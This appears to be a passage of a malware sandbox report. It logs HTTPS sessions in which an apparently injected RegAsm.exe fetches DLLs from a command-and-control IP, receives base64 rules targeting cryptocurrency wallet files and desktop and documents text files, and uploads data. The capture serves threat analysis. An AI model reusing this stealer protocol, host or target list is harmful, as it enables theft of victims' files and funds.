                                                                                  Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZVxM@
                                                                                  2024-05-15 18:36:18 UTC16384INData Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73
                                                                                  Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
                                                                                  2024-05-15 18:36:18 UTC16384INData Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00
                                                                                  Data Ascii: USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|~
                                                                                  2024-05-15 18:36:19 UTC16384INData Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff
                                                                                  Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.2.44975395.217.240.1014435984C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-15 18:36:19 UTC225OUTGET /vcruntime140.dll HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:36:20 UTC245INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:36:20 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 80880
                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                  Connection: close
                                                                                  ETag: "6315a9f4-13bf0"
                                                                                  Accept-Ranges: bytes
                                                                                  2024-05-15 18:36:20 UTC16139INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                  2024-05-15 18:36:20 UTC16384INData Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18
                                                                                  Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
                                                                                  2024-05-15 18:36:20 UTC16384INData Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47
                                                                                  Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
                                                                                  2024-05-15 18:36:20 UTC16384INData Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a
                                                                                  Data Ascii: t@++t+t+u+uQ<0|*<9&w/c5~bASJCtvB
                                                                                  2024-05-15 18:36:20 UTC15589INData Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e
                                                                                  Data Ascii: |5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  18192.168.2.44975495.217.240.1014435984C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-15 18:36:21 UTC326OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDG
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Content-Length: 1145
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:36:21 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 32 31 31 34 63 33 34 34 37 31 38 63 32 37 34 30 63 37 66 38 63 38 35 38 36 36 62 61 62 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="token"5e2114c344718c2740c7f8c85866bab9------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------JKFIDGDHJEGIEBFHDGDGCont
                                                                                  2024-05-15 18:36:22 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:36:22 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-15 18:36:22 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2ok0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  19192.168.2.44975595.217.240.1014435984C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-15 18:36:24 UTC325OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----FCFBFHIEBKJKFHIEBFBA
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Content-Length: 331
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:36:24 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 32 31 31 34 63 33 34 34 37 31 38 63 32 37 34 30 63 37 66 38 63 38 35 38 36 36 62 61 62 39 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------FCFBFHIEBKJKFHIEBFBAContent-Disposition: form-data; name="token"5e2114c344718c2740c7f8c85866bab9------FCFBFHIEBKJKFHIEBFBAContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------FCFBFHIEBKJKFHIEBFBACont
                                                                                  2024-05-15 18:36:25 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:36:25 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-15 18:36:25 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                  Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  20192.168.2.44975695.217.240.1014435984C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-15 18:36:25 UTC325OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----CGIDAAAKJJDBGCBFCBGI
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Content-Length: 331
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:36:25 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 32 31 31 34 63 33 34 34 37 31 38 63 32 37 34 30 63 37 66 38 63 38 35 38 36 36 62 61 62 39 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="token"5e2114c344718c2740c7f8c85866bab9------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------CGIDAAAKJJDBGCBFCBGICont
                                                                                  2024-05-15 18:36:26 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:36:26 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-15 18:36:26 UTC131INData Raw: 37 38 0d 0a 52 47 56 6d 59 58 56 73 64 48 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 52 38 4e 54 42 38 64 48 4a 31 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 5a 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 77 3d 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 78RGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8NTB8dHJ1ZXwqd2luZG93cyp8ZGVza3RvcHwlREVTS1RPUCVcfCoudHh0fDUwfGZhbHNlfCp3aW5kb3dzKnw=0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  21192.168.2.44975795.217.240.1014435984C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-15 18:36:27 UTC325OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHC
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Content-Length: 453
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:36:27 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 32 31 31 34 63 33 34 34 37 31 38 63 32 37 34 30 63 37 66 38 63 38 35 38 36 36 62 61 62 39 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="token"5e2114c344718c2740c7f8c85866bab9------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------GCGHJEBGHJKEBFHIJDHCCont
                                                                                  2024-05-15 18:36:27 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:36:27 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-15 18:36:27 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2ok0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  22192.168.2.44975895.217.240.1014435984C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-15 18:36:29 UTC328OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----AECAKECAEGDHIECBGHII
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Content-Length: 116501
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:36:29 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 32 31 31 34 63 33 34 34 37 31 38 63 32 37 34 30 63 37 66 38 63 38 35 38 36 36 62 61 62 39 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="token"5e2114c344718c2740c7f8c85866bab9------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------AECAKECAEGDHIECBGHIICont
                                                                                  2024-05-15 18:36:29 UTC16355OUTData Raw: 78 2f 75 4e 2b 6c 47 34 2f 33 47 2f 53 67 42 6f 6a 41 78 67 6e 6a 39 61 46 58 62 78 75 4a 48 59 48 74 53 37 6a 2f 41 48 47 2f 53 6a 4a 2f 75 4e 2b 6c 41 78 76 6c 6a 4a 4a 4a 4a 4e 4b 55 42 4a 4f 53 44 6e 4f 52 52 75 50 39 78 76 30 6f 33 48 2b 34 33 36 55 44 41 49 41 51 63 6e 69 6d 65 58 67 41 42 69 4d 64 44 54 39 78 2f 75 4e 2b 6c 42 4a 2f 75 4e 2b 6c 41 78 68 6a 79 63 35 50 58 4a 46 4b 71 37 63 38 6e 6b 35 6f 33 48 2b 34 33 36 55 5a 50 39 78 76 30 6f 47 4b 52 53 55 62 6a 2f 63 62 39 4b 54 4a 2f 75 4e 2b 6c 41 43 30 6d 4b 54 4a 2f 75 4e 2b 6c 47 34 2f 33 47 2f 53 67 42 61 53 6a 4a 2f 75 4e 2b 6c 4e 4a 50 38 41 63 62 39 4b 43 68 61 4b 54 4a 2f 75 4e 2b 6c 47 34 2f 33 47 2f 53 67 41 4e 42 4e 4a 6b 35 2b 36 52 2b 56 4c 51 55 63 39 62 66 36 2b 35 2f 36 36 74
                                                                                  Data Ascii: x/uN+lG4/3G/SgBojAxgnj9aFXbxuJHYHtS7j/AHG/SjJ/uN+lAxvljJJJJNKUBJOSDnORRuP9xv0o3H+436UDAIAQcnimeXgABiMdDT9x/uN+lBJ/uN+lAxhjyc5PXJFKq7c8nk5o3H+436UZP9xv0oGKRSUbj/cb9KTJ/uN+lAC0mKTJ/uN+lG4/3G/SgBaSjJ/uN+lNJP8Acb9KChaKTJ/uN+lG4/3G/SgANBNJk5+6R+VLQUc9bf6+5/66t
